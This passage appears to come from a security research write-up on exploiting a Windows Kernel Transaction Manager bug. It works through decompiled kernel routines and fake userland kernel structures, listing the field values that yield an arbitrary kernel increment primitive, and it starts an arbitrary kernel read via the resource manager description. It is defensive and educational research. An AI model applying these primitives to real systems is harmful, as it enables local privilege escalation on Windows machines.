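static uint32_t toy_release(toy_mutant *m, const void *thread) {
    if (m->owner_thread != thread)
        return TOY_STATUS_MUTANT_NOT_OWNED;  /* real code: RtlRaiseStatus() */
    m->signal_state++;
    return TOY_STATUS_SUCCESS;
}
```

Starting from SignalState = 1, a wait by the recovery thread drops it to 0. A release by the same thread brings it back to 1, which is the value the next check depends on.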

Safely ignore safe-unlinking on Windows >= 8

Next, we hit the following code and enter the else condition, since our SignalState was just set back to 1.

if ( Mutant->Header.SignalState != 1 || SignalState > 0 ) {
    _InterlockedAnd(&Mutant->Header.Lock, 0xFFFFFF7F);
}
else {
    _m_prefetchw(Mutant);
    ObjectLock = Mutant->Header.Lock;
    HIBYTE(ObjectLock) = 0;
    OwnerThread = Mutant->OwnerThread;
    ApcDisable = Mutant->ApcDisable;
    Mutant->Header.Lock = ObjectLock;
    //...
    MutantBlink = Mutant->MutantListEntry.Blink;
    MutantFlink = Mutant->MutantListEntry.Flink;
    MutantBlink->Flink = MutantFlink;
    MutantFlink->Blink = MutantBlink;
    _InterlockedAnd64(&OwnerThread->ThreadLock, 0i64);
    //...

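Note that this code uses safe unlinking on Windows 8 and later. As previously noted, we did most of our reversing on Windows 7, so it isn’t shown in our excerpt. Because KeWaitForSingleObject() inserted our _KMUTANT into the list with legitimate links, the safe-unlinking checks pass, which is why we can safely ignore them. The main point is that our _KMUTANT is removed from the owning thread’s mutant list (_KTHREAD.MutantListHead).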
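For reference, the Windows 8+ style check amounts to verifying that both neighbours point back at the entry before unlinking it. The following is a minimal sketch of that idea with a hypothetical checked_unlink() helper. Where the kernel fails fast, the sketch returns false. A list built by genuine insertions, like the one KeWaitForSingleObject() produced for our _KMUTANT, passes this check.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Unlink only if the neighbours are consistent with the entry; otherwise
   refuse (the kernel would fail fast instead of returning). */
static bool checked_unlink(list_entry *entry) {
    list_entry *flink = entry->flink;
    list_entry *blink = entry->blink;
    if (flink->blink != entry || blink->flink != entry)
        return false;
    blink->flink = flink;
    flink->blink = blink;
    return true;
}
```

With head, a and b forming a genuine circular list, unlinking b succeeds and reconnects a directly to the head. An entry whose Flink points somewhere that does not point back is rejected before anything is written.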

Our first requirement towards finding a write primitive goes hand in hand with the initial kernel address revelation we already used:

- _KMUTANT.Header.Type = MutantObject

- _KMUTANT.Header.SignalState = 1

- _KMUTANT.MutantListEntry = Legitimate links (automatically set by KeWaitForSingleObject())

- _KMUTANT.OwnerThread = Owner thread (automatically set by KeWaitForSingleObject())

These _KMUTANT prerequisites are reflected in the following updated diagram:



After unlinking the _KMUTANT.MutantListEntry entry, KeReleaseMutant() attempts to process another linked list, this time _KMUTANT.Header.WaitListHead. This wait list is effectively a linked list of threads blocked waiting for the _KMUTANT to be released so that they can acquire it themselves. In reality, none are waiting. However, as we control the entire contents of the _KMUTANT, we can specify an arbitrary number of them. Let’s take a look:

WaitListHead_entry = Mutant->Header.WaitListHead.Flink;
Mutant->OwnerThread = 0i64;
if ( WaitListHead_entry != &Mutant->Header.WaitListHead ) {
    CurWaitBlock = WaitListHead_entry;
    do
    {
        CurWaitBlock = CurWaitBlock->WaitListEntry.Flink;
        Flink = CurWaitBlock->WaitListEntry.Flink;
        Blink = CurWaitBlock->WaitListEntry.Blink;
        Blink->Flink = CurWaitBlock->WaitListEntry.Flink;
        Flink->Blink = Blink;
        if ( CurWaitBlock->WaitType == WaitAny ) {
            if ( KiTryUnwaitThread(CurrentPrcb, CurWaitBlock, CurWaitBlock->WaitKey, a4) ) {
                bSignalStateIsOne = Mutant->Header.SignalState-- == 1;
                if ( bSignalStateIsOne )
                    break;
            }
        }
        else {
            KiTryUnwaitThread(CurrentPrcb, CurWaitBlock, 0x100, 0i64);
        }
    }
    while ( CurWaitBlock != &Mutant->Header.WaitListHead );
}

Above, if _KMUTANT.Header.WaitListHead.Flink does not point to itself, then an attempt is made to notify a waiting _KTHREAD that the _KMUTANT is now available. A waiting _KTHREAD is represented on this list by a _KWAIT_BLOCK (CurWaitBlock), which will typically point to the associated _KTHREAD:

//0x30 bytes (sizeof)
struct _KWAIT_BLOCK
{
    struct _LIST_ENTRY WaitListEntry;   //0x0
    struct _KTHREAD* Thread;            //0x10
    VOID* Object;                       //0x18
    struct _KWAIT_BLOCK* NextWaitBlock; //0x20
    USHORT WaitKey;                     //0x28
    UCHAR WaitType;                     //0x2a
    volatile UCHAR BlockState;          //0x2b
    LONG SpareLong;                     //0x2c
};

Before we targeted Windows 8, we had planned to abuse this unlink operation, since Flink and Blink are fully controlled. A couple of similar unsafe unlinks could also be abused as a powerful mirror write primitive on Windows Vista and Windows 7.

However, as noted earlier, these unlink primitives go away in later versions of Windows, so we must look deeper. This is why we investigated the call to KiTryUnwaitThread() in the code above. KiTryUnwaitThread() can be reached from either of the two call sites above, which we keep in mind while analyzing paths through the function.

Before even trying to abuse KiTryUnwaitThread(), our second prerequisite is that Flink and Blink are correctly set pointers such that they allow a safe unlink of our fake waiting _KWAIT_BLOCK from the list without error.

We chose to abuse this behavior, so we add a new requirement:

- _KMUTANT.Header.WaitListHead = Points to a fake _KWAIT_BLOCK (i.e. not to self)

So we call KiTryUnwaitThread() with a CurWaitBlock value that points to a _KWAIT_BLOCK structure we control. Let’s see how to set up our _KWAIT_BLOCK.

do {
    CurWaitBlock = CurWaitBlock->WaitListEntry.Flink;
    // ...
    if ( CurWaitBlock->WaitType == WaitAny ) {
        if ( KiTryUnwaitThread(CurrentPrcb, CurWaitBlock, CurWaitBlock->WaitKey, a4) ) {
            bSignalStateIsOne = Mutant->Header.SignalState-- == 1;
            if ( bSignalStateIsOne )
                break;
        }
    }
    else {
        KiTryUnwaitThread(CurrentPrcb, CurWaitBlock, 0x100, 0i64);
    }
}
while ( CurWaitBlock != &Mutant->Header.WaitListHead );

The calls to KiTryUnwaitThread() are in a do-while loop that terminates when CurWaitBlock points back to Mutant->Header.WaitListHead. We can exit this loop in either of two ways:

- by eventually pointing one CurWaitBlock in the linked list back to the head;
- by causing bSignalStateIsOne to be set and breaking out.

Since everything is controlled, either option works. Keep the latter option in mind while we continue investigating KiTryUnwaitThread().

Increment primitive in KiTryUnwaitThread()

The first thing KiTryUnwaitThread() does is grab a reference to the thread associated with the _KWAIT_BLOCK, which we fully control.

OwnerThread = WaitBlock->Thread;
result = 0;
//...
if ( OwnerThread->State == Suspended ) {
    //...
}

If the thread state is not Suspended, the thread isn’t woken up, because it is not actually blocked waiting to deal with the _KMUTANT. KiTryUnwaitThread() then returns early, which we want to avoid so that we can investigate deeper.

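This means we must provide a fake _KTHREAD structure with State set to Suspended to enter this if condition. Suspended appears to be a decompiler labeling artifact. Hex-Rays renders the value 5 with its KWAIT_REASON name, whereas as a KTHREAD_STATE value, 5 is Waiting, which matches the requirement that the thread be blocked.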

Next we hit this code:

if ( OwnerThread->State == Suspended ) {
    if ( (OwnerThread->WaitRegister.Flags & 3) == 1 ) {
        ThreadQueue = OwnerThread->Queue;
        if ( ThreadQueue )
            _InterlockedAdd(&ThreadQueue->CurrentCount, 1u);
        //...

The code above shows that if a specific flag is set, a pointer to a _KQUEUE structure (ThreadQueue) is read from the _KTHREAD. If ThreadQueue is not NULL, its CurrentCount field is incremented. This is the increment primitive we will use; as we will see, the remainder of the function offers little that is useful to us.

We update our list of requirements for this increment primitive:

- _KWAIT_BLOCK.Thread = Points to a fake _KTHREAD

- _KTHREAD.State = Suspended

- _KTHREAD.WaitRegister.Flags = 1

- _KTHREAD.Queue = Arbitrary kernel address we wish to increment, adjusted by the offset of CurrentCount within _KQUEUE (the field that is actually incremented)
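The gating conditions for the increment can be summarised as a small model. This is a toy sketch with these assumptions:

- toy_thread and toy_queue are hypothetical types that keep only the fields the KiTryUnwaitThread() excerpt reads.
- The state value 5 is the one the decompiler displays as Suspended.
- The real code uses an interlocked add where the sketch uses a plain increment.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-ins, not the real _KQUEUE/_KTHREAD layouts. */
typedef struct toy_queue {
    int32_t current_count;          /* the field the excerpt increments */
} toy_queue;

typedef struct toy_thread {
    uint8_t state;                  /* value the decompiler shows as Suspended */
    uint8_t wait_register_flags;
    toy_queue *queue;
} toy_thread;

#define TOY_STATE_SUSPENDED 5

/* Returns 1 if the excerpt's increment would fire for this thread, else 0. */
static int toy_try_unwait_increment(toy_thread *t) {
    if (t->state != TOY_STATE_SUSPENDED)
        return 0;                   /* early return: thread not blocked */
    if ((t->wait_register_flags & 3) == 1 && t->queue != NULL) {
        t->queue->current_count += 1;  /* kernel: _InterlockedAdd(&Queue->CurrentCount, 1) */
        return 1;
    }
    return 0;
}
```

All three conditions must hold together. If the state or the flag bits differ, the queue is left untouched, which mirrors the early exits in the excerpt.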

Next, let’s see how to keep the function executing safely so that it returns to the main TmRecoverResourceManager() loop. This will let us call our increment primitive repeatedly.

Exiting KiTryUnwaitThread()

We hit the following code:

WaitPrcb = OwnerThread->SuspendApc.SystemArgument1;

if ( WaitPrcb ) {

[..]

if ( OwnerThread->SuspendApc.SystemArgument1 )

{

Blink = OwnerThread->WaitListEntry.Blink;

Flink = OwnerThread->WaitListEntry.Flink;

Blink->Flink = Flink;

Flink->Blink = Blink;

OwnerThread->SuspendApc.SystemArgument1 = 0i64;

}

_InterlockedAnd64(WaitPrcb + 2450, 0i64);

}

result = 1;

OwnerThread->DeferredProcessor = CurrentPrcb->Number;

OwnerThread->State = WrExecutive;

OwnerThread->WaitListEntry.Flink = CurrentPrcb->DeferredReadyListHead;

CurrentPrcb->DeferredReadyListHead = &OwnerThread->WaitListEntry;

OwnerThread->WaitStatus = WaitType;

}

By choosing to use this increment primitive, we have no option but to execute the remainder of the code above. As mentioned earlier, we cannot abuse unlinking on Windows 8 and above, so for simplicity we leave SuspendApc.SystemArgument1 set to NULL, which skips the unlink entirely.

We add yet another requirement:

- _KTHREAD.SuspendApc.SystemArgument1 = 0

Because of the code path we are executing, we cannot avoid result being set to 1. Our fake thread is also pushed onto the CurrentPrcb->DeferredReadyListHead list, which means it is queued to be readied for scheduling. These are things we will have to deal with later.

Now let’s continue to try to exit KiTryUnwaitThread() and see if there are any other values we must set.

As noted, result is always set to 1, so we enter the first if condition. Whether pOutputVar is NULL depends on which of the two earlier KiTryUnwaitThread() calls was made, so we take a look at what happens if pOutputVar is set and we enter the nested if condition.

if ( result ) {

if ( pOutputVar ) {

*pOutputVar = OwnerThread;

WaitObject = WaitBlock->Object;

if ( (WaitObject->Header.Type & 0x7F) == MutantObject)

{

OwnerThread->KernelApcDisable -= WaitObject->ApcDisable;

if ( CurrentPrcb->CurrentThread == OwnerThread )

DpcRoutineActive = CurrentPrcb->DpcRoutineActive;

else

DpcRoutineActive = 0;

__asm { prefetchw byte ptr [r8] }

ObjectLock = WaitObject->Header.Lock;

HIBYTE(ObjectLock) = DpcRoutineActive;

bIsAbandoned = WaitObject->Abandoned == 0;

WaitObject->OwnerThread = OwnerThread;

WaitObject->Header.Lock = ObjectLock;

if ( !bIsAbandoned )

{

WaitObject->Abandoned = 0;

OwnerThread->WaitStatus |= 0x80ui64;

}

MutantListEntry = &WaitObject->MutantListEntry;

MutantListHead_Blink = OwnerThread->MutantListHead.Blink;

MutantListEntry->Flink = &OwnerThread->MutantListHead;

MutantListEntry->Blink = MutantListHead_Blink;

MutantListHead_Blink->Flink = MutantListEntry;

OwnerThread->MutantListHead.Blink = MutantListEntry;

}

}

}

}

_InterlockedAnd64(&OwnerThread->ThreadLock, 0i64);

++WaitBlock->BlockState;

return result;

}

Above we see there is not much of interest from an exploit primitive perspective: there are no additional write primitives, only more unlinks to avoid. We chose to set the _KWAIT_BLOCK.Object pointer to some object containing a _DISPATCHER_HEADER structure whose Type is anything other than MutantObject, so we avoid the nested if condition in the event pOutputVar is set.

In this case, we return result = 1, meaning we escape the earlier do while loop (the one that called KiTryUnwaitThread()) through the test on bSignalStateIsOne and the break statement. Alternatively, since we also control CurWaitBlock, we could make sure the while loop condition is satisfied by pointing the fake _KWAIT_BLOCK.WaitListEntry.Flink back to &Mutant->Header.WaitListHead:

do {

[...]

if ( CurWaitBlock->WaitType == WaitAny ) {

if ( KiTryUnwaitThread(CurrentPrcb, CurWaitBlock, CurWaitBlock->WaitKey, a4) ) {

bSignalStateIsOne = Mutant->Header.SignalState-- == 1;

if ( bSignalStateIsOne )

break;

}

}

[...]

}

while ( CurWaitBlock != &Mutant->Header.WaitListHead );

So to satisfy KiTryUnwaitThread(), we add the following requirements for the fake _KWAIT_BLOCK structure:

- _KWAIT_BLOCK.Object = A fake _KMUTANT structure

- _KMUTANT.Header.Type != MutantObject
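The two ways out of the do while loop can be modelled in a few lines. This is a sketch under simplifying assumptions: the structures are hypothetical, the wait list is reduced to forward links, and `stub_try_unwait()` stands in for KiTryUnwaitThread() returning 1, as our fake _KWAIT_BLOCK guarantees.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified model of the loop in KeReleaseMutant(). Wait blocks
 * form a circular list whose head lives inside the mutant. */
typedef struct list_entry { struct list_entry *Flink; } list_entry;

typedef struct fake_wait_block {
    list_entry WaitListEntry;   /* first member, so a cast recovers the block */
    int WaitTypeIsAny;
} fake_wait_block;

typedef struct fake_mutant {
    int SignalState;
    list_entry WaitListHead;
} fake_mutant;

/* Stand-in for KiTryUnwaitThread(): our fake path always returns 1. */
static int stub_try_unwait(fake_wait_block *wb) { (void)wb; return 1; }

/* Returns how many wait blocks were "unwaited" before the loop exited. */
int model_release_loop(fake_mutant *m)
{
    int unwaited = 0;
    list_entry *cur = m->WaitListHead.Flink;
    /* Requirement: the head points to a fake wait block, not to itself. */
    assert(cur != NULL && cur != &m->WaitListHead);
    do {
        fake_wait_block *wb = (fake_wait_block *)cur;
        cur = cur->Flink;                   /* advance before processing */
        if (wb->WaitTypeIsAny && stub_try_unwait(wb)) {
            unwaited++;
            if (m->SignalState-- == 1)
                break;                      /* exit through bSignalStateIsOne */
        }
    } while (cur != &m->WaitListHead);      /* or exit through the list head */
    return unwaited;
}
```

With SignalState set to 1 the break fires after the first unwait; with any other value, pointing the fake block's Flink back at the list head ends the loop through the while condition instead.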

Below is an updated diagram illustrating the new set of requirements as we understand them:



Exiting KiProcessThreadWaitList() and KeReleaseMutex()

So we are back in KeReleaseMutant():

if ( Abandoned )

{

//...

}

}

if ( CurrentPrcb->DeferredReadyListHead )

KiProcessThreadWaitList(CurrentPrcb, 1, Increment, 1);

We aren't Abandoned, so we skip that block, and we are now out of the else condition we entered because our _KMUTANT.SignalState value was 1. Recall that because we opted to abuse the _KTHREAD.Queue pointer as an increment primitive, KiTryUnwaitThread() set CurrentPrcb->DeferredReadyListHead to point to our fake userland _KTHREAD structure, so we have no option but to enter KiProcessThreadWaitList() and deal with some more unavoidable complexity.

Let’s take a look:

char __fastcall KiProcessThreadWaitList(struct _KPRCB *Prcb, char WaitReason, KPRIORITY Increment, char UnkFlag)

{

WaitingThread_shifted = Prcb->DeferredReadyListHead;

Prcb->DeferredReadyListHead = 0i64;

do

{

pWaitingThread = ADJ(WaitingThread_shifted);

WaitingThread_shifted = ADJ(WaitingThread_shifted)->WaitListEntry.Flink;

KiUnlinkWaitBlocks(pWaitingThread->WaitBlockList);

pWaitingThread->AdjustReason = WaitReason;

pWaitingThread->AdjustIncrement = Increment;

result = KiReadyThread(pWaitingThread, v9, v10, v11);

}

while ( WaitingThread_shifted );

return result;

}

We see that a pointer to our fake _KTHREAD is processed (pWaitingThread). Its list of _KWAIT_BLOCK structures is unlinked by calling KiUnlinkWaitBlocks(). We have no option but to supply at least one _KWAIT_BLOCK here, as the pointer is not checked for NULL before the do while loop dereferences it.
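The outer loop of KiProcessThreadWaitList() drains a singly linked list that KiTryUnwaitThread() pushed our fake thread onto. The sketch below models that push/drain pair with hypothetical simplified types (`fake_thread`, `fake_prcb`), ignores the ADJ() container adjustment, and assumes the list was empty before our push, so that our thread's link ends up NULL and the loop runs exactly once.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical model of the per-processor deferred ready list: a singly
 * linked LIFO threaded through each thread's WaitListEntry.Flink. The real
 * code links the WaitListEntry fields and recovers the thread with ADJ(). */
typedef struct fake_thread {
    struct fake_thread *NextDeferred;   /* stands in for WaitListEntry.Flink */
    int ProcessedCount;
} fake_thread;

typedef struct fake_prcb {
    fake_thread *DeferredReadyListHead;
} fake_prcb;

/* What the tail of KiTryUnwaitThread() does with our fake thread. */
void model_push_deferred(fake_prcb *prcb, fake_thread *t)
{
    t->NextDeferred = prcb->DeferredReadyListHead;
    prcb->DeferredReadyListHead = t;
}

/* Shape of KiProcessThreadWaitList(): detach the list, then a do while loop
 * that does not check the first element, so the caller must only call it
 * when the list is non-empty (KeReleaseMutant() checks this beforehand). */
int model_process_deferred(fake_prcb *prcb)
{
    fake_thread *next = prcb->DeferredReadyListHead;
    int count = 0;
    assert(next != NULL);
    prcb->DeferredReadyListHead = NULL;
    do {
        fake_thread *t = next;
        next = t->NextDeferred;
        t->ProcessedCount++;   /* KiUnlinkWaitBlocks() and KiReadyThread() */
        count++;
    } while (next != NULL);
    return count;
}
```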

The KiUnlinkWaitBlocks() function looks approximately like this:

char __fastcall KiUnlinkWaitBlocks(struct _KWAIT_BLOCK *pCurWaitBlock)

{

CurWaitBlock_Head = pCurWaitBlock;

do

{

LODWORD(BlockState) = pCurWaitBlock->BlockState;

if ( BlockState < 3 )

{

pObject = pCurWaitBlock->Object;

//...

LOBYTE(BlockState) = pCurWaitBlock->BlockState;

if ( BlockState == 2 )

{

BlockState = pCurWaitBlock->WaitListEntry.Blink;

v5 = pCurWaitBlock->WaitListEntry.Flink;

BlockState->Flink = pCurWaitBlock->WaitListEntry.Flink;

v5->Blink = BlockState;

}

_InterlockedAnd(pObject, 0xFFFFFF7F);

}

pCurWaitBlock = pCurWaitBlock->NextWaitBlock;

}

while ( pCurWaitBlock != CurWaitBlock_Head );

return BlockState;

}

The above function is from Windows 7, and we see that if we ensure BlockState >= 3, we skip the unlinking. Note that there is some additional logic on Windows 10, so we actually want the value to be greater than 5 to be sure we skip everything across all versions.

Next, as long as we set the NextWaitBlock of this fake _KWAIT_BLOCK to point to itself, we will exit the do while loop after the first iteration.
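The following sketch models the Windows 7 loop shape of KiUnlinkWaitBlocks() with a hypothetical, simplified wait block type. It counts how many blocks would enter the unlinking branch and how many iterations run, showing why BlockState = 7 and a self-referencing NextWaitBlock give exactly one harmless iteration.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified wait block with only the fields the loop reads. */
typedef struct fake_wait_block {
    struct fake_wait_block *NextWaitBlock;
    unsigned char BlockState;
} fake_wait_block;

/* Follows the Windows 7 loop shape quoted above. Returns how many blocks
 * would enter the BlockState < 3 branch (where the unlink can happen) and
 * stores the number of loop iterations in *iterations. */
int model_unlink_wait_blocks(fake_wait_block *head, int *iterations)
{
    fake_wait_block *cur = head;
    int touched = 0;
    assert(head != NULL);   /* the real loop dereferences it unconditionally */
    *iterations = 0;
    do {
        (*iterations)++;
        if (cur->BlockState < 3)
            touched++;
        cur = cur->NextWaitBlock;
    } while (cur != head);
    return touched;
}
```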

More requirements:

- _KTHREAD.WaitBlockList = Point to a fake _KWAIT_BLOCK

- _KWAIT_BLOCK.BlockState = 7

- _KWAIT_BLOCK.NextWaitBlock = Points to self

So, what else does KiProcessThreadWaitList() do? Next up we enter KiReadyThread(). Keep in mind that we are still parsing a totally fabricated _KTHREAD structure in userland and our increment primitive has already executed. We aren't interested in constructing a thread that actually runs. Our current goal is just to exit this function as soon as possible, unless we encounter a write primitive that is obviously better than our increment.

We hit the following in KiReadyThread():

char __fastcall KiReadyThread(struct _KTHREAD *pThread, __int64 a2)

{

//...

if ( pThread->MiscFlags & 1 ) {

LOBYTE(ret) = KiDeferredReadyThread(pThread, a2);

}

else {

CurProcess = pThread->ApcState.Process;

We choose to bypass KiDeferredReadyThread() to avoid reversing a rather hefty unavoidable while loop, so we leave bit 0 of MiscFlags clear.

This brings another requirement:

- _KTHREAD.MiscFlags != 1

It also means we have to specify a _KPROCESS structure pointer in our _KTHREAD.ApcState.Process field. What does it do with this fake _KPROCESS?

//...

if ( CurProcess->StackCount.Value & 7 ) {

LOBYTE(ret) = KiRequestProcessInSwap(pThread, CurProcess);

}

else {

_InterlockedExchangeAdd(&CurProcess->StackCount.Value, 8u);

_InterlockedAnd(&CurProcess->Header.Lock, 0xFFFFFF7F);

pThread->State = 6;

ret = KiStackInSwapListHead;

v5 = pThread->WaitListEntry.Flink;

do {

*v5 = ret;

v6 = ret;

ret = _InterlockedCompareExchange(&KiStackInSwapListHead, v5, ret);

}

while ( ret != v6 );

if ( !ret )

LOBYTE(ret) = KeSetEvent(&KiSwapEvent, 10, 0);

}

}

return ret;

}

The else branch above looks somewhat complicated and may signal a global event (KiSwapEvent), whose implications could be annoying to reverse, so let's first see what KiRequestProcessInSwap() does.

char __fastcall KiRequestProcessInSwap(struct _KTHREAD *pThread, struct _KPROCESS *pCurProcess)

{

bVal = 0;

//...

pThread->State = 1;

pThread->MiscFlags |= 4u;

_InterlockedAnd64(&pThread->ThreadLock, 0i64);

ReadyListHeadBlink = pCurProcess->ReadyListHead.Blink;

pThread->WaitListEntry.Flink = &pCurProcess->ReadyListHead;

pThread->WaitListEntry.Blink = ReadyListHeadBlink;

ReadyListHeadBlink->Flink = &pThread->WaitListEntry;

pCurProcess->ReadyListHead.Blink = &pThread->WaitListEntry;

StackCountValue = pCurProcess->StackCount.Value & 7;

if ( StackCountValue == 1 )

{

_m_prefetchw(&pCurProcess->StackCount);

StackCountValue = _InterlockedXor(&pCurProcess->StackCount.Value, 3u);

bVal = 1;

}

_InterlockedAnd(&pCurProcess->Header.Lock, 0xFFFFFF7F);

if ( !bVal )

return StackCountValue;

[...]

Above we see that bVal starts as 0, and if we keep it at 0, we exit KiRequestProcessInSwap() early at the end of the excerpt. All of the Flink and Blink pointers involved are fully controlled by us, so we can make sure every one of them is a valid pointer.

We also need to make sure that pCurProcess->StackCount.Value & 7 is non-zero (remember this is what let us enter this function in the first place) but not equal to 1, which is the only value that sets bVal.

We add even more requirements now:

- _KTHREAD.Process points to fake _KPROCESS

- _KPROCESS.StackCount.Value & 7 != 1 (but non-zero)

- _KPROCESS.ReadyListHead = Safe unlinkable pointers
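The branch selection across KiReadyThread() and KiRequestProcessInSwap() boils down to two bit tests. The sketch below encodes them as they appear in the excerpts above. The enum names are ours, and any checks hidden behind the `//...` elisions are not modelled.

```c
#include <assert.h>
#include <stdint.h>

/* Which branch a fake thread/process pair drives the code into.
 * Enum names are ours; the bit tests come from the excerpts above. */
typedef enum {
    PATH_DEFERRED_READY,       /* MiscFlags & 1: KiDeferredReadyThread() */
    PATH_STACK_INSWAP_LIST,    /* StackCount & 7 == 0: else branch, may KeSetEvent() */
    PATH_INSWAP_FULL,          /* KiRequestProcessInSwap() with bVal = 1 */
    PATH_INSWAP_EARLY_RETURN   /* KiRequestProcessInSwap() returns early */
} ready_path;

ready_path model_ready_thread_path(uint32_t misc_flags, uint64_t stack_count)
{
    uint64_t low = stack_count & 7;
    if (misc_flags & 1)
        return PATH_DEFERRED_READY;
    if (low == 0)
        return PATH_STACK_INSWAP_LIST;
    return (low == 1) ? PATH_INSWAP_FULL : PATH_INSWAP_EARLY_RETURN;
}
```

The early-return path is the one we want, which is why the fake _KPROCESS needs StackCount.Value & 7 to be non-zero but not 1. Note that the MiscFlags test only looks at bit 0, so other bits in that field do not matter here.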

Once all these conditions are met, we exit KiRequestProcessInSwap(), which triggers a series of returns all the way back into KeReleaseMutant() without a new fake thread being scheduled.

So, this brings us to this part of the code in KeReleaseMutant(), where we just returned from KiProcessThreadWaitList():

if ( CurrentPrcb->DeferredReadyListHead )

KiProcessThreadWaitList(CurrentPrcb, 1, Increment, 1);

if ( Wait ) {

pCurrentThread_1 = CurrentPrcb->CurrentThread;

pCurrentThread_1->Tcb.MiscFlags |= 8u;

pCurrentThread_1->Tcb.WaitIrql = CurrentIrql;

goto b_end;

}

if ( CurrentIrql WaitType < DISPATCH_LEVEL ) {

When TmRecoverResourceManager() calls KeReleaseMutex(), the Wait argument is 0, so we won't enter the if ( Wait ) block. The very beginning of the function raised our IRQL to DISPATCH_LEVEL and we haven't lowered it yet, so we also skip the following IRQL check. Even if we had entered it, it would be easy to cope with, as that code no longer operates on our fake structures.



Increment primitive summary

Function calls

To recap the functions involved in our primitive, the following call graph shows what is called and which part of the primitive each call is responsible for.

Fake userland structures requirements

So finally we are back inside TmRecoverResourceManager(), and what did we get out of it all? We are able to increment an arbitrary address, and, what is more, we can trigger the increment as many times as we want, because we can simply construct Limited Write Primitive (LWP) enlistments and chain them together.

To summarize, the full set of requirements that were discovered are:

- _KMUTANT.Header.Type = MutantObject

- _KMUTANT.Header.SignalState = 1

- _KMUTANT.MutantListEntry = Legitimate links (automatically set by KeWaitForSingleObject())

- _KMUTANT.OwnerThread = Owner thread (automatically set by KeWaitForSingleObject())

- _KMUTANT.Header.WaitListHead = Points to a fake _KWAIT_BLOCK (i.e. not to self)

- _KWAIT_BLOCK.Object->WaitType != MutantObject

- _KWAIT_BLOCK.Object = Points to a fake _KMUTANT

- _KMUTANT.Header.Type != MutantObject

- _KWAIT_BLOCK.Thread = Points to a fake _KTHREAD

- _KTHREAD.State = Suspended

- _KTHREAD.WaitRegister.Flags = 1

- _KTHREAD.Queue = Arbitrary address in kernel we wish to increment

- _KTHREAD.SuspendApc.SystemArgument1 = 0

- _KTHREAD.WaitBlockList = Point to a fake _KWAIT_BLOCK

- _KWAIT_BLOCK.BlockState = 7

- _KWAIT_BLOCK.NextWaitBlock = Points to self

- _KTHREAD.MiscFlags != 1

- _KTHREAD.Process points to fake _KPROCESS

- _KPROCESS.StackCount.Value & 7 != 1 (but non-zero)

- _KPROCESS.ReadyListHead = Safe unlinkable pointers

This LWP enlistment and most of its associated requirements are illustrated in the completed diagram below. As this diagram is far too complex to show each time, from now on an "LWP enlistment" refers to an enlistment that satisfies all the preconditions it describes.

Note: In the diagram above, due to space requirements, structure members don’t necessarily reflect the actual member order, but rather the order in which code parses them.

Generally, we want to set an address in memory to a given value. One major caveat with an increment primitive is that we need to know the value in memory before we start incrementing it, so that we know how many increments it takes to reach the intended value.

So before we can use our increment primitive, we need an arbitrary kernel read primitive. This would allow us to leak the value at any address, and then use our increment primitive the number of times required to turn it into the intended value.

We will take a quick detour to show another handy side effect of leaking the _KRESOURCEMANAGER address: it lets us build an arbitrary kernel read primitive.

Arbitrary kernel read primitive

Currently we have two useful outcomes:

- Leak the addresses of two kernel objects: a _KTHREAD and a _KRESOURCEMANAGER

- Being able to increment any arbitrary address any number of times

Where do we go from here towards escalating privileges?

At first we tested our basic theory using well-known win32k primitives, which rely on leaking kernel addresses from userland and building a write primitive, for example with a tagWND structure. We didn't want to rely on this long term, as it would work neither in a sandboxed environment nor on recent Windows versions. In the end, one of our goals was to avoid win32k entirely for this exploit, just for interest's sake.

One obvious approach was to look for similarly abusable features in KTM-related structures whose addresses we already know. The most obvious to us was _KRESOURCEMANAGER, which we knew from reversing has an associated _UNICODE_STRING Description that you can query using the NtQueryInformationResourceManager() syscall. The _UNICODE_STRING structure looks like this:

struct _UNICODE_STRING

{

USHORT Length; //0x0

USHORT MaximumLength; //0x2

USHORT* Buffer; //0x8

};

Note: This structure has been heavily abused in win32k exploitation involving the tagWND, so we won't review it in detail. See our writeup on exploiting CVE-2015-0057, or the many other researchers' papers that discuss it, for additional details.

One unfortunate thing (from an attacker’s perspective) about the use of the resource manager’s description is that there is no syscall that lets us change it after creation of the resource manager, so we will never be able to write new data into the existing buffer. This means we cannot use this _UNICODE_STRING as a direct write primitive. We confirmed this by reversing NtSetInformationResourceManager().

The _UNICODE_STRING description field meets the only hard requirement of our arbitrary increment primitive, which is that we know its starting value. Indeed, if we simply create a resource manager with no description using CreateResourceManager(), we know the contents of the _UNICODE_STRING will be 0, so we can use our increment primitive to set its fields to whatever we want and use it to read an arbitrary kernel address. Then, if we want to read the contents of another kernel address, we know the old value, so we modify it again from its current value until we reach the new value we want.

The following excerpt shows the code we abuse to build an arbitrary kernel read primitive:

NTSTATUS __stdcall NtQueryInformationResourceManager(HANDLE ResourceManagerHandle,

RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,

PRESOURCEMANAGER_BASIC_INFORMATION ResourceManagerInformation,

ULONG ResourceManagerInformationLength, PULONG ReturnLength)

{

//...

if ( ResourceManagerInformationLength >= 0x18 )

{

//...

DescriptionLength = pResMgr->Description.Length;

ResourceManagerInformation->ResourceManagerId = RmId_;

ResourceManagerInformation->DescriptionLength = DescriptionLength;

AdjustedDescriptionLength = pResMgr->Description.Length + 0x14;

if ( ResourceManagerInformationLength >= AdjustedDescriptionLength ) {

copyLength = pResMgr->Description.Length;

}

else {

rcval = STATUS_BUFFER_OVERFLOW;

copyLength = ResourceManagerInformationLength - 0x14;

}

memmove( ResourceManagerInformation->Description, pResMgr->Description.Buffer, copyLength);

}

In our case, we use our increment primitive to set both pResMgr->Description.Buffer and pResMgr->Description.Length to values we choose. Then we call the NtQueryInformationResourceManager() syscall, and copyLength bytes from the address in Buffer are copied back to us in userland. This seems quite straightforward.

Note: as detailed in part 2 of this series, this is the same syscall we were using to congest the resource manager’s mutex while trying to win the race condition in the first place.
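The length logic of NtQueryInformationResourceManager() can be reduced to a small function. This sketch assumes the comparison in the excerpt checks whether the caller's buffer can hold the 0x14-byte header plus the whole description; the function and macro names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Offset of the Description array in the output structure, per the excerpt. */
#define DESCRIPTION_OFFSET 0x14u

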